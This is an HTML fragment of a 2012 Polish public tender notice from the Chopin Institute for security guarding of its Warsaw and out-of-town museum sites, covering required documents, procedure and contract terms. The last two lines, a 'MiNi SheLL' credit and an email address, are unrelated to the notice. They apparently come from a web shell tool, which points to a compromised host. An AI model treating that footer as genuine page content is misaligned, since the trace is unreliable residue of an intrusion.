<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- oświadczenie o dysponowaniu odpowiednim dla wykonania zamówienia wyposażeniu w sprzęt i urządzenia mobilne i stacjonarne - według opisu proponowanego przez Wykonawcę; 
- oświadczenie o zobowiązaniu się Wykonawcy do przedłużenia polisy oC na cały okres realizacji zamówienia</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej umowy w ramach niniejszego postępowania o udzielenie zamówienia publicznego, jeżeli konieczność dokonania takich zmian będzie wynikać z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne dla Zamawiającego i interesu publicznego realizowanego w ramach postępowania oraz nie naruszą treści oferty. Zmiany te, za zgodą stron umowy, mogą wynikać ze zmiany warunków, w jakich będzie realizowana umowa, które ujawnią się po podpisaniu umowy w trakcie jej realizacji, wynikających ze zmian organizacyjnych dotyczących ochranianych obiektów (np. remont obiektu i zapewniona ochrona własna wykonawcy remontu), wprowadzenia do ochrony nowych pomieszczeń lub terenu albo zmniejszenie takiego zakresu ochrony, czego Zamawiający nie mógł przewidzieć w chwili podpisywania umowy. 
Zamawiający uwzględnia ograniczoną możliwość zwiększenia zakresu umowy, to jest przedłużona umowa może dotyczyć zmniejszonej lub zwiększonej liczby obiektów. Warunki przedłużenia umowy zostaną zachowane takie jak ustalone dla obecnie zawieranej umowy, stawka wynagrodzenia za godzinę dyżuru faktycznie zatrudnionych pracowników ochrony może ulec zmianie o wysokość oficjalnie ogłoszonego wskaźnika inflacyjnego. W przypadku zwiększenia zakresu ochrony w trakcie realizacji umowy poprzez rozszerzenie ochrony na nowe obiekty należące do Zamawiającego bądź zwiększenia zatrudnienia - Wykonawca utrzyma stawki  za godzinę dyżuru jak w złożonej ofercie dla usługi głównej. W przypadku zmniejszenia zakresu ochrony poprzez wyłączenie obiektów lub obszarów spod ochrony z przyczyn, których nie przewidywał Zamawiający, a które czynią ochronę w tych obiektach lub obszarach zbędną albo nieuzasadnioną finansowo, Zamawiający zmniejszy zakres ochrony na czas wyłączenia i o wartość kosztów tej ochrony pomniejszone zostanie wynagrodzenie na czas wyłączenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chopin.nifc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Narodowy Instytut Fryderyka Chopina, 00-355 Warszawa, ul. Tamka 43, Zespół Zamówień Publicznych, V piętro, pokój 5.7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2012 godzina 12:00, miejsce: Narodowy Instytut Fryderyka Chopina, 00-355 Warszawa, ul. Tamka 43, Koncelaria Instytutu, II piętro, wejście od ulicy Tamka 43.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ochrona obiektów będących w posiadaniu Narodowego Instytutu Fryderyka Chopina w Warszawie: Muzeum Fryderyka Chopina przy ul. Okólnik 1 i Centrum Chopinowskie przy ul. Tamka 43.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi ochrony osób i mienia Zamawiającego realizowane w formach określonych w art. 3 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2005 r. Nr 145, poz. 1221 ze zmianami): 
- bezpośredniej ochrony fizycznej stałej lub doraźnej, polegającej również na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, 
- a także w formach zabezpieczenia technicznego niezbędnych dla zapewnienia właściwego wykonywania ochrony, uzgodnionych z Zamawiającym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 92.52.12.00-1, 92.52.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ochrona obiektów będących w posiadaniu Narodowego Instytutu Fryderyka Chopina poza Warszawą: Dom Urodzenia Fryderyka Chopina w Żelazowej Woli i Zespół Dworsko-Parkowy w Brochowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi ochrony osób i mienia Zamawiającego realizowane w formach określonych w art. 3 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2005 r. Nr 145, poz. 1221 ze zmianami): 
- bezpośredniej ochrony fizycznej stałej lub doraźnej, polegającej również na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, 
- a także w formach zabezpieczenia technicznego niezbędnych dla zapewnienia właściwego wykonywania ochrony, uzgodnionych z Zamawiającym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 92.52.12.00-1, 92.52.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com